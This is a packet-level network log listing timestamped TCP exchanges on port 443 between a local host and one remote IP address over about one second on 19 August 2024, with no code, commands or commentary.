Aug 19, 2024 09:28:39.262525082 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.262578011 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.262588024 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.262624025 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.310385942 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.310420036 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.310563087 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.310607910 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.310666084 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.311965942 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.311989069 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.312047005 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.312057018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.312088966 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.312108040 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.352931976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.352963924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.353084087 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.353104115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.353152037 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.354094028 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.354118109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.354185104 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.354192019 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.354233027 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.354398966 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.354419947 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.354449987 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.354460001 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.354485989 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.354505062 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.354552984 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.354573011 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.354612112 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.354618073 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.354645014 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.354669094 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.354990959 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.355016947 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.355057001 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.355062962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.355091095 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.355110884 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.355293036 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.355313063 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.355369091 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.355379105 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.355446100 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.404407978 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.404432058 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.404536009 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.404567957 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.404604912 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.445725918 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.445760012 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.445835114 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.445869923 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.445872068 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.445897102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.445926905 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.446760893 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.446783066 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.446830034 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.446841955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.446872950 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.446989059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.447019100 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.447042942 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.447048903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.447098017 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.447343111 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.447365999 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.447397947 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.447402954 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.447423935 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.447726011 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.447751045 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.447774887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.447786093 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.447810888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.447952986 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.447973013 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.448005915 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.448013067 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.448023081 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.448400021 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.497216940 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.497277021 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.497369051 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.497395992 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.497410059 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.497436047 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.544322014 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.544354916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.544420004 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.544445992 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.544471025 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.544490099 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.544639111 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.544662952 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.544691086 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.544697046 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.544720888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.544739962 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.545006990 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.545036077 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.545080900 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.545087099 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.545129061 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.545295000 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.545316935 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.545347929 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.545353889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.545380116 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.545609951 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.545634985 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.545665979 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.545671940 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.545690060 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.545706987 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.545902967 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.545927048 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.545959949 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.545965910 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.545984983 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.546009064 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.546214104 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.546246052 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.546281099 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.546287060 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.546310902 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.546327114 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.546984911 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.590048075 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.590094090 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.590188980 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.590210915 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.590234041 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.590256929 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.637032032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.637061119 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.637183905 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.637207985 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.637250900 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.637290955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.637312889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.637341976 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.637347937 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.637373924 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.637388945 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.644568920 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.644593954 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.644706011 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.644717932 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.644754887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.644850969 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.644877911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.644906044 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.644911051 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.644937992 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.644956112 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.645123959 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.645143032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.645169973 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.645175934 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.645203114 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.645220041 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.645472050 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.645492077 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.645520926 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.645526886 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.645550013 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.645569086 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.645803928 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.645823956 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.645868063 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.645874023 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.645906925 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.682511091 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.682547092 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.682650089 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.682667971 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.682699919 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.729942083 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.729984045 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.730051041 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.730065107 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.730087042 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.730103970 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.730130911 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.730170965 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.737215996 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.737246990 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.737325907 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.737338066 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.737497091 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.737528086 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.737552881 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.737560987 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.737581968 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.737750053 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.737770081 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.737796068 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.737802982 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.737823009 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.738143921 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.738169909 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.738195896 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.738202095 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.738226891 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.738395929 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.738414049 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.738439083 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.738445997 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.738466024 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.776010990 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.776041985 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.776154995 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.776192904 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.822254896 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.822292089 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.822418928 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.822475910 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.824554920 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.824584007 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.824628115 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.824650049 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.824677944 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.829858065 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.829878092 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.829982996 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.830002069 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.830159903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.830184937 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.830224037 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.830244064 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.830265999 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.830470085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.830491066 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.830528021 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.830540895 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.830566883 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.830805063 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.830828905 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.830866098 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.830882072 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.830908060 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.831440926 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.831459999 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.831505060 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.831538916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.831571102 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.871241093 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.871275902 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.871462107 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.871491909 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.914928913 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.914954901 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.915014029 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.915046930 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.915062904 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.915735960 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.915764093 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.915790081 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.915796995 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.915817022 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.925905943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.925934076 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.925997972 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.926008940 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.926043987 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.926177979 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.926198959 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.926224947 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.926230907 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.926245928 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.926731110 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.926754951 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.926780939 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.926788092 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.926820040 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.927190065 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.927210093 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.927257061 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.927264929 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.927289009 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.927689075 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.927714109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.927742004 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.927747965 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.927772999 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.964072943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.964104891 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.964238882 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.964339018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.008143902 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.008172989 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.008213043 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.008239985 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.008255005 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.008869886 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.008892059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.008919954 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.008932114 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.008946896 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.014928102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.014956951 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.015014887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.015039921 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.015053988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.015479088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.015496969 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.015523911 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.015532970 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.015564919 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.016469002 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.016516924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.016519070 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.016536951 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.016571045 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.016673088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.016724110 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.016732931 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.016746044 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.016794920 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.016802073 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.017138004 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.017163038 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.017195940 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.017203093 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.017227888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.053735018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.053745031 CEST	443	49759	185.149.100.242	192.168.2.4
